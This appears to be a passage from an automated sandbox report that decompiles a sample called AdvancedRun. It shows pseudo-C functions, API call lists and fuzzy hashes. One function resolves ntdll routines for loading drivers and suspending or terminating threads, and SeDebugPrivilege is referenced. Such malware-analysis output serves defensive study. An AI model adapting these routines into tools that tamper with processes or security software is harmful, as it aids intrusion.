                                                                  0x00409592
                                                                  0x004095aa
                                                                  0x00409594
                                                                  0x004095a3
                                                                  0x004095a6
                                                                  0x004095a6

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                  • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                  • API String ID: 1714573020-3385500049
                                                                  • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                  • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                  • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                  • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 411 402f31-402f78 memset call 404ad9 wcsrchr 414 402f7a 411->414 415 402f7e-402f9f wcscat 411->415 414->415 416 402fa1-402fb2 call 404923 415->416 417 402fb3-402fbd call 402fc6 415->417 416->417 420 402fc2-402fc5 417->420
                                                                  C-Code - Quality: 84%
                                                                  			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t22;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
				return _t22;
			}











                                                                  0x00402f3a
                                                                  0x00402f51
                                                                  0x00402f60
                                                                  0x00402f6f
                                                                  0x00402f78
                                                                  0x00402f7a
                                                                  0x00402f7a
                                                                  0x00402f8a
                                                                  0x00402f8f
                                                                  0x00402f94
                                                                  0x00402f99
                                                                  0x00402f9e
                                                                  0x00402f9f
                                                                  0x00402fad
                                                                  0x00402fb2
                                                                  0x00402fb2
                                                                  0x00402fbd
                                                                  0x00402fc5

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00402F51
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • wcsrchr.MSVCRT ref: 00402F6F
                                                                  • wcscat.MSVCRT ref: 00402F8A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                  • String ID: .cfg
                                                                  • API String ID: 776488737-3410578098
                                                                  • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                  • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                  • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                  • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 35%
                                                                  			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                  0x00409ddc
                                                                  0x00409de4
                                                                  0x00409df0
                                                                  0x00409df5
                                                                  0x00409df6
                                                                  0x00409e03
                                                                  0x00409e05
                                                                  0x00409e06
                                                                  0x00409e3b
                                                                  0x00409e5d
                                                                  0x00409e6a
                                                                  0x00409e73
                                                                  0x00409e75
                                                                  0x00409e08
                                                                  0x00409e08
                                                                  0x00409e19
                                                                  0x00409e37
                                                                  0x00409e37
                                                                  0x00409e81

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00409E08
                                                                    • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                    • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                  • memset.MSVCRT ref: 00409E3B
                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0040C4E8,?,00002000,?), ref: 00409E5D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                  • String ID:
                                                                  • API String ID: 1127616056-0
                                                                  • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                  • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                  • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                  • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 443 404951-404956 444 404958-404959 443->444 445 40499e-4049a1 443->445 446 40495b-404965 444->446 446->446 447 404967-404977 malloc 446->447 448 404994-40499d 447->448 449 404979-40497b 447->449 450 40498d-404993 free 449->450 451 40497d-40498a memcpy 449->451 450->448 451->450
                                                                  C-Code - Quality: 100%
                                                                  			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                  0x00404951
                                                                  0x00404952
                                                                  0x00404956
                                                                  0x004049a1
                                                                  0x00404958
                                                                  0x00404959
                                                                  0x0040495b
                                                                  0x0040495b
                                                                  0x0040495f
                                                                  0x00404961
                                                                  0x00404963
                                                                  0x0040496d
                                                                  0x00404975
                                                                  0x00404977
                                                                  0x0040497b
                                                                  0x00404985
                                                                  0x0040498a
                                                                  0x0040498e
                                                                  0x00404993
                                                                  0x0040499d
                                                                  0x0040499d

                                                                  APIs
                                                                  • malloc.MSVCRT ref: 0040496D
                                                                  • memcpy.MSVCRT ref: 00404985
                                                                  • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: freemallocmemcpy
                                                                  • String ID: W@
                                                                  • API String ID: 3056473165-1729568415
                                                                  • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                  • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                  • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                  • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                  0x0040543f
                                                                  0x00405456
                                                                  0x00405462
                                                                  0x00405467
                                                                  0x0040546d
                                                                  0x00405478
                                                                  0x00405489
                                                                  0x0040548d
                                                                  0x00000000
                                                                  0x00405492
                                                                  0x00405496

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                    • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                    • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                  • wcscat.MSVCRT ref: 00405478
                                                                  • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                  • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                  • String ID:
                                                                  • API String ID: 3725422290-0
                                                                  • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                  • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                  • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                  • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409E82, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                    • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                    • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                    • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                  • String ID:
                                                                  • API String ID: 4232544981-0
                                                                  • Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                  • Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
                                                                  • Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                  • Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                  0x00408f4c
                                                                  0x00408f57
                                                                  0x00408f60
                                                                  0x00408f62
                                                                  0x00408f67
                                                                  0x00408f67
                                                                  0x00408f71

                                                                  APIs
                                                                    • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                    • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentErrorFreeLastLibraryProcess
                                                                  • String ID:
                                                                  • API String ID: 187924719-0
                                                                  • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                  • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                  • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                  • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 37%
                                                                  			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                  0x004098fa
                                                                  0x004098fc
                                                                  0x00409901
                                                                  0x00409907
                                                                  0x00000000
                                                                  0x0040991c
                                                                  0x00409918
                                                                  0x00000000

                                                                  APIs
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$FileModuleName
                                                                  • String ID:
                                                                  • API String ID: 3859505661-0
                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                  • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                  • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                  0x004095da
                                                                  0x004095da
                                                                  0x004095de
                                                                  0x004095e1
                                                                  0x004095e7
                                                                  0x004095e7
                                                                  0x004095ee
                                                                  0x004095fc

                                                                  APIs
                                                                  • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID:
                                                                  • API String ID: 3664257935-0
                                                                  • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                  • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                  • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                  • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                  0x0040a3d0
                                                                  0x0040a3d9

                                                                  APIs
                                                                  • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: EnumNamesResource
                                                                  • String ID:
                                                                  • API String ID: 3334572018-0
                                                                  • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                  • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                  • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                  • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                  0x00408e38
                                                                  0x00408e44
                                                                  0x00408e56
                                                                  0x00408e68
                                                                  0x00408e7a
                                                                  0x00408e8c
                                                                  0x00408e9e
                                                                  0x00408eb0
                                                                  0x00408ec2
                                                                  0x00408ed4
                                                                  0x00408ee6
                                                                  0x00408ef8
                                                                  0x00408f0a
                                                                  0x00408f1c
                                                                  0x00408f21
                                                                  0x00408f23
                                                                  0x00000000
                                                                  0x00408f28
                                                                  0x00408f29

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                  • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                  • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                  • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                  • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                  • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                  • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                  • API String ID: 667068680-4280973841
                                                                  • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                  • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                  • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
